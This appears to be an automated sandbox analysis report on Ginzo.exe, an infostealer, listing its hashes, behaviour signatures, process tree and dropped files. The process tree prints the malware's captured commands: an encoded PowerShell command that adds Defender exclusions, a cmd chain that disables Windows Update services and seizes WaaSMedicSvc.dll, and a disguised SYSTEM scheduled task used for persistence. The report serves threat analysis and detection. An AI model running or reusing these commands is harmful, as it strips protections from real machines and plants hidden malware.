Analysis
-
max time kernel
45s -
max time network
56s -
platform
windows10-2004_x64 -
resource
win10v2004-20220414-en -
submitted
20-05-2022 23:04
Static task
static1
Behavioral task
behavioral1
Sample
Ginzo.exe
Resource
win7-20220414-en
General
-
Target
Ginzo.exe
-
Size
184KB
-
MD5
9d754925aa0e92fcc36d052bafa0cc1d
-
SHA1
5f2afa65a5a43cf21b5b6fa2933ca909989679ad
-
SHA256
9d5c5ef922aa7343c1ec29d5a6eb1b006f4b3aee817211ea958b6810df28510b
-
SHA512
8775eda9a19379b6875b8eef50c7da17abda07ee1caa7fe45e83ed23a5c2b7f749e04f514b298a85e2ff73df3c4ca35263b69756f14790e65d72cf34e3067582
Malware Config
Signatures
-
Modifies security service 2 TTPs 5 IoCs
Processes:
reg.exedescription ioc process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 reg.exe -
suricata: ET MALWARE Observed Zingo/GinzoStealer CnC Domain (nominally .ru in TLS SNI)
suricata: ET MALWARE Observed Zingo/GinzoStealer CnC Domain (nominally .ru in TLS SNI)
-
Downloads MZ/PE file
-
Executes dropped EXE 2 IoCs
Processes:
722038.exeupdater.exepid process 4404 722038.exe 1396 updater.exe -
Possible privilege escalation attempt 2 IoCs
Processes:
takeown.exeicacls.exepid process 5000 takeown.exe 4272 icacls.exe -
Stops running service(s) 3 TTPs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
Ginzo.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation Ginzo.exe -
Loads dropped DLL 7 IoCs
Processes:
Ginzo.exepid process 4864 Ginzo.exe 4864 Ginzo.exe 4864 Ginzo.exe 4864 Ginzo.exe 4864 Ginzo.exe 4864 Ginzo.exe 4864 Ginzo.exe -
Modifies file permissions 1 TTPs 2 IoCs
Processes:
takeown.exeicacls.exepid process 5000 takeown.exe 4272 icacls.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 16 freegeoip.app 17 freegeoip.app -
Drops file in Program Files directory 2 IoCs
Processes:
conhost.exedescription ioc process File created C:\Program Files\Chrome\updater.exe conhost.exe File opened for modification C:\Program Files\Chrome\updater.exe conhost.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
Ginzo.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 Ginzo.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier Ginzo.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Modifies registry key 1 TTPs 9 IoCs
Processes:
reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exepid process 3336 reg.exe 3816 reg.exe 5016 reg.exe 432 reg.exe 2412 reg.exe 3308 reg.exe 1156 reg.exe 4140 reg.exe 4056 reg.exe -
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
powershell.execonhost.exepid process 3280 powershell.exe 3280 powershell.exe 3148 conhost.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
Processes:
Ginzo.exepowershell.execonhost.exetakeown.exedescription pid process Token: SeDebugPrivilege 4864 Ginzo.exe Token: SeDebugPrivilege 3280 powershell.exe Token: SeDebugPrivilege 3148 conhost.exe Token: SeTakeOwnershipPrivilege 5000 takeown.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
Ginzo.exe722038.execonhost.execmd.execmd.execmd.execmd.exedescription pid process target process PID 4864 wrote to memory of 4404 4864 Ginzo.exe 722038.exe PID 4864 wrote to memory of 4404 4864 Ginzo.exe 722038.exe PID 4404 wrote to memory of 3148 4404 722038.exe conhost.exe PID 4404 wrote to memory of 3148 4404 722038.exe conhost.exe PID 4404 wrote to memory of 3148 4404 722038.exe conhost.exe PID 3148 wrote to memory of 4956 3148 conhost.exe cmd.exe PID 3148 wrote to memory of 4956 3148 conhost.exe cmd.exe PID 4956 wrote to memory of 3280 4956 cmd.exe powershell.exe PID 4956 wrote to memory of 3280 4956 cmd.exe powershell.exe PID 3148 wrote to memory of 2432 3148 conhost.exe cmd.exe PID 3148 wrote to memory of 2432 3148 conhost.exe cmd.exe PID 2432 wrote to memory of 3124 2432 cmd.exe sc.exe PID 2432 wrote to memory of 3124 2432 cmd.exe sc.exe PID 2432 wrote to memory of 3880 2432 cmd.exe sc.exe PID 2432 wrote to memory of 3880 2432 cmd.exe sc.exe PID 2432 wrote to memory of 2296 2432 cmd.exe sc.exe PID 2432 wrote to memory of 2296 2432 cmd.exe sc.exe PID 2432 wrote to memory of 732 2432 cmd.exe sc.exe PID 2432 wrote to memory of 732 2432 cmd.exe sc.exe PID 3148 wrote to memory of 1276 3148 conhost.exe cmd.exe PID 3148 wrote to memory of 1276 3148 conhost.exe cmd.exe PID 2432 wrote to memory of 868 2432 cmd.exe sc.exe PID 2432 wrote to memory of 868 2432 cmd.exe sc.exe PID 2432 wrote to memory of 432 2432 cmd.exe reg.exe PID 2432 wrote to memory of 432 2432 cmd.exe reg.exe PID 1276 wrote to memory of 4112 1276 cmd.exe schtasks.exe PID 1276 wrote to memory of 4112 1276 cmd.exe schtasks.exe PID 2432 wrote to memory of 3336 2432 cmd.exe reg.exe PID 2432 wrote to memory of 3336 2432 cmd.exe reg.exe PID 2432 wrote to memory of 2412 2432 cmd.exe reg.exe PID 2432 wrote to memory of 2412 2432 cmd.exe reg.exe PID 2432 wrote to memory of 3308 2432 cmd.exe reg.exe PID 2432 wrote to memory of 3308 2432 cmd.exe reg.exe PID 2432 wrote to memory of 1156 2432 cmd.exe reg.exe PID 2432 wrote to memory of 1156 2432 cmd.exe reg.exe PID 2432 wrote to memory of 5000 2432 cmd.exe takeown.exe PID 2432 wrote to memory of 5000 2432 cmd.exe takeown.exe PID 2432 wrote to memory of 4272 2432 cmd.exe icacls.exe PID 2432 wrote to memory of 4272 2432 cmd.exe icacls.exe PID 2432 wrote to memory of 3816 2432 cmd.exe reg.exe PID 2432 wrote to memory of 3816 2432 cmd.exe reg.exe PID 2432 wrote to memory of 4140 2432 cmd.exe reg.exe PID 2432 wrote to memory of 4140 2432 cmd.exe reg.exe PID 2432 wrote to memory of 5016 2432 cmd.exe reg.exe PID 2432 wrote to memory of 5016 2432 cmd.exe reg.exe PID 2432 wrote to memory of 4056 2432 cmd.exe reg.exe PID 2432 wrote to memory of 4056 2432 cmd.exe reg.exe PID 2432 wrote to memory of 3804 2432 cmd.exe schtasks.exe PID 2432 wrote to memory of 3804 2432 cmd.exe schtasks.exe PID 2432 wrote to memory of 4356 2432 cmd.exe schtasks.exe PID 2432 wrote to memory of 4356 2432 cmd.exe schtasks.exe PID 2432 wrote to memory of 3332 2432 cmd.exe schtasks.exe PID 2432 wrote to memory of 3332 2432 cmd.exe schtasks.exe PID 2432 wrote to memory of 1476 2432 cmd.exe schtasks.exe PID 2432 wrote to memory of 1476 2432 cmd.exe schtasks.exe PID 2432 wrote to memory of 3060 2432 cmd.exe schtasks.exe PID 2432 wrote to memory of 3060 2432 cmd.exe schtasks.exe PID 2432 wrote to memory of 2368 2432 cmd.exe schtasks.exe PID 2432 wrote to memory of 2368 2432 cmd.exe schtasks.exe PID 2432 wrote to memory of 4944 2432 cmd.exe schtasks.exe PID 2432 wrote to memory of 4944 2432 cmd.exe schtasks.exe PID 3148 wrote to memory of 1620 3148 conhost.exe cmd.exe PID 3148 wrote to memory of 1620 3148 conhost.exe cmd.exe PID 1620 wrote to memory of 1372 1620 cmd.exe schtasks.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Ginzo.exe"C:\Users\Admin\AppData\Local\Temp\Ginzo.exe"1⤵
- Checks computer location settings
- Loads dropped DLL
- Checks processor information in registry
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\722038.exe"C:\Users\Admin\AppData\Local\722038.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\722038.exe"3⤵
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAHUAYwBjACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAbAB6AHEAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAaQB5AHMAZAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBjAGgAaQAjAD4A"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -EncodedCommand "PAAjAHUAYwBjACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAbAB6AHEAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAaQB5AHMAZAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBjAGgAaQAjAD4A"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\sc.exesc stop UsoSvc5⤵
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc5⤵
-
C:\Windows\system32\sc.exesc stop wuauserv5⤵
-
C:\Windows\system32\sc.exesc stop dosvc5⤵
-
C:\Windows\system32\sc.exesc stop bits5⤵
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f5⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f5⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f5⤵
- Modifies security service
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f5⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f5⤵
- Modifies registry key
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\WaaSMedicSvc.dll5⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q5⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f5⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f5⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f5⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f5⤵
- Modifies registry key
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE5⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr '^"C:\Program Files\Chrome\updater.exe^"'4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr '"C:\Program Files\Chrome\updater.exe"'5⤵
- Creates scheduled task(s)
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c schtasks /run /tn "GoogleUpdateTaskMachineQC"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /run /tn "GoogleUpdateTaskMachineQC"5⤵
-
C:\Program Files\Chrome\updater.exe"C:\Program Files\Chrome\updater.exe"1⤵
- Executes dropped EXE
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files\Chrome\updater.exeFilesize
4.1MB
MD5c1fd183c8ef30db8e2be4ab51e42501f
SHA167a5ba161cafa7f0471f03968dd0f94cfb21aa1a
SHA256003bf16a4661cccc90dd7410ab077d356a3d434effe1047a6df1c133b1746b33
SHA5128b3060ae4c8e8e7f376ed40ac9741206f9d82f3185571a4edd2be05de5240ae743356cd498a842f58f969286e80014ecae29423a618b520d97cedc5a01ddc2f0
-
C:\Program Files\Chrome\updater.exeFilesize
4.1MB
MD5c1fd183c8ef30db8e2be4ab51e42501f
SHA167a5ba161cafa7f0471f03968dd0f94cfb21aa1a
SHA256003bf16a4661cccc90dd7410ab077d356a3d434effe1047a6df1c133b1746b33
SHA5128b3060ae4c8e8e7f376ed40ac9741206f9d82f3185571a4edd2be05de5240ae743356cd498a842f58f969286e80014ecae29423a618b520d97cedc5a01ddc2f0
-
C:\Users\Admin\AppData\Local\722038.exeFilesize
4.1MB
MD5c1fd183c8ef30db8e2be4ab51e42501f
SHA167a5ba161cafa7f0471f03968dd0f94cfb21aa1a
SHA256003bf16a4661cccc90dd7410ab077d356a3d434effe1047a6df1c133b1746b33
SHA5128b3060ae4c8e8e7f376ed40ac9741206f9d82f3185571a4edd2be05de5240ae743356cd498a842f58f969286e80014ecae29423a618b520d97cedc5a01ddc2f0
-
C:\Users\Admin\AppData\Local\722038.exeFilesize
4.1MB
MD5c1fd183c8ef30db8e2be4ab51e42501f
SHA167a5ba161cafa7f0471f03968dd0f94cfb21aa1a
SHA256003bf16a4661cccc90dd7410ab077d356a3d434effe1047a6df1c133b1746b33
SHA5128b3060ae4c8e8e7f376ed40ac9741206f9d82f3185571a4edd2be05de5240ae743356cd498a842f58f969286e80014ecae29423a618b520d97cedc5a01ddc2f0
-
C:\Users\Admin\AppData\Local\Temp\DotNetZip.dllFilesize
461KB
MD5a999d7f3807564cc816c16f862a60bbe
SHA11ee724daaf70c6b0083bf589674b6f6d8427544f
SHA2568e9c0362e9bfb3c49af59e1b4d376d3e85b13aed0fbc3f5c0e1ebc99c07345f3
SHA5126f1f73314d86ae324cc7f55d8e6352e90d4a47f0200671f7069daa98592daaceea34cf89b47defbecdda7d3b3e4682de70e80a5275567b82aa81b002958e4414
-
C:\Users\Admin\AppData\Local\Temp\DotNetZip.dllFilesize
461KB
MD5a999d7f3807564cc816c16f862a60bbe
SHA11ee724daaf70c6b0083bf589674b6f6d8427544f
SHA2568e9c0362e9bfb3c49af59e1b4d376d3e85b13aed0fbc3f5c0e1ebc99c07345f3
SHA5126f1f73314d86ae324cc7f55d8e6352e90d4a47f0200671f7069daa98592daaceea34cf89b47defbecdda7d3b3e4682de70e80a5275567b82aa81b002958e4414
-
C:\Users\Admin\AppData\Local\Temp\Newtonsoft.Json.dllFilesize
685KB
MD5081d9558bbb7adce142da153b2d5577a
SHA17d0ad03fbda1c24f883116b940717e596073ae96
SHA256b624949df8b0e3a6153fdfb730a7c6f4990b6592ee0d922e1788433d276610f3
SHA5122fdf035661f349206f58ea1feed8805b7f9517a21f9c113e7301c69de160f184c774350a12a710046e3ff6baa37345d319b6f47fd24fbba4e042d54014bee511
-
C:\Users\Admin\AppData\Local\Temp\Newtonsoft.Json.dllFilesize
685KB
MD5081d9558bbb7adce142da153b2d5577a
SHA17d0ad03fbda1c24f883116b940717e596073ae96
SHA256b624949df8b0e3a6153fdfb730a7c6f4990b6592ee0d922e1788433d276610f3
SHA5122fdf035661f349206f58ea1feed8805b7f9517a21f9c113e7301c69de160f184c774350a12a710046e3ff6baa37345d319b6f47fd24fbba4e042d54014bee511
-
C:\Users\Admin\AppData\Local\Temp\System.Data.SQLite.dllFilesize
384KB
MD555c797383dbbbfe93c0fe3215b99b8ec
SHA11b089157f3d8ae64c62ea15cdad3d82eafa1df4b
SHA2565fac5a9e9b8bbdad6cf661dbf3187e395914cd7139e34b725906efbb60122c0d
SHA512648a7da0bcda6ccd31b4d6cdc1c90c3bc3c11023fcceb569f1972b8f6ab8f92452d1a80205038edcf409669265b6756ba0da6b1a734bd1ae4b6c527bbebb8757
-
C:\Users\Admin\AppData\Local\Temp\System.Data.SQLite.dllFilesize
384KB
MD555c797383dbbbfe93c0fe3215b99b8ec
SHA11b089157f3d8ae64c62ea15cdad3d82eafa1df4b
SHA2565fac5a9e9b8bbdad6cf661dbf3187e395914cd7139e34b725906efbb60122c0d
SHA512648a7da0bcda6ccd31b4d6cdc1c90c3bc3c11023fcceb569f1972b8f6ab8f92452d1a80205038edcf409669265b6756ba0da6b1a734bd1ae4b6c527bbebb8757
-
C:\Users\Admin\AppData\Local\Temp\x86\SQLite.Interop.dllFilesize
1.3MB
MD58be215abf1f36aa3d23555a671e7e3be
SHA1547d59580b7843f90aaca238012a8a0c886330e6
SHA25683f332ea9535814f18be4ee768682ecc7720794aedc30659eb165e46257a7cae
SHA51238cf4aea676dacd2e719833ca504ac8751a5fe700214ff4ac2b77c0542928a6a1aa3780ed7418387affed67ab6be97f1439633249af22d62e075c1cdfdf5449b
-
memory/432-164-0x0000000000000000-mapping.dmp
-
memory/732-161-0x0000000000000000-mapping.dmp
-
memory/868-163-0x0000000000000000-mapping.dmp
-
memory/1156-169-0x0000000000000000-mapping.dmp
-
memory/1276-162-0x0000000000000000-mapping.dmp
-
memory/1372-184-0x0000000000000000-mapping.dmp
-
memory/1476-179-0x0000000000000000-mapping.dmp
-
memory/1620-183-0x0000000000000000-mapping.dmp
-
memory/2296-160-0x0000000000000000-mapping.dmp
-
memory/2368-181-0x0000000000000000-mapping.dmp
-
memory/2412-167-0x0000000000000000-mapping.dmp
-
memory/2432-156-0x0000000000000000-mapping.dmp
-
memory/3060-180-0x0000000000000000-mapping.dmp
-
memory/3124-158-0x0000000000000000-mapping.dmp
-
memory/3148-155-0x00007FFECB870000-0x00007FFECC331000-memory.dmpFilesize
10.8MB
-
memory/3148-151-0x0000010DDDD20000-0x0000010DDE13B000-memory.dmpFilesize
4.1MB
-
memory/3280-154-0x0000023D8C920000-0x0000023D8C942000-memory.dmpFilesize
136KB
-
memory/3280-157-0x00007FFECB870000-0x00007FFECC331000-memory.dmpFilesize
10.8MB
-
memory/3280-153-0x0000000000000000-mapping.dmp
-
memory/3308-168-0x0000000000000000-mapping.dmp
-
memory/3332-178-0x0000000000000000-mapping.dmp
-
memory/3336-166-0x0000000000000000-mapping.dmp
-
memory/3804-176-0x0000000000000000-mapping.dmp
-
memory/3816-172-0x0000000000000000-mapping.dmp
-
memory/3880-159-0x0000000000000000-mapping.dmp
-
memory/4056-175-0x0000000000000000-mapping.dmp
-
memory/4112-165-0x0000000000000000-mapping.dmp
-
memory/4140-173-0x0000000000000000-mapping.dmp
-
memory/4272-171-0x0000000000000000-mapping.dmp
-
memory/4356-177-0x0000000000000000-mapping.dmp
-
memory/4404-148-0x0000000000000000-mapping.dmp
-
memory/4864-130-0x0000000000260000-0x0000000000298000-memory.dmpFilesize
224KB
-
memory/4864-141-0x000000000C960000-0x000000000CB22000-memory.dmpFilesize
1.8MB
-
memory/4864-131-0x000000000ACA0000-0x000000000AD32000-memory.dmpFilesize
584KB
-
memory/4864-147-0x000000000DCB0000-0x000000000DD2A000-memory.dmpFilesize
488KB
-
memory/4864-144-0x000000000DC40000-0x000000000DCA6000-memory.dmpFilesize
408KB
-
memory/4864-132-0x000000000B2F0000-0x000000000B894000-memory.dmpFilesize
5.6MB
-
memory/4864-143-0x000000000DA20000-0x000000000DA5C000-memory.dmpFilesize
240KB
-
memory/4864-135-0x000000000B1D0000-0x000000000B280000-memory.dmpFilesize
704KB
-
memory/4864-140-0x000000000C3C0000-0x000000000C422000-memory.dmpFilesize
392KB
-
memory/4864-137-0x000000000B280000-0x000000000B2A2000-memory.dmpFilesize
136KB
-
memory/4864-136-0x000000000B170000-0x000000000B1C0000-memory.dmpFilesize
320KB
-
memory/4944-182-0x0000000000000000-mapping.dmp
-
memory/4956-152-0x0000000000000000-mapping.dmp
-
memory/5000-170-0x0000000000000000-mapping.dmp
-
memory/5016-174-0x0000000000000000-mapping.dmp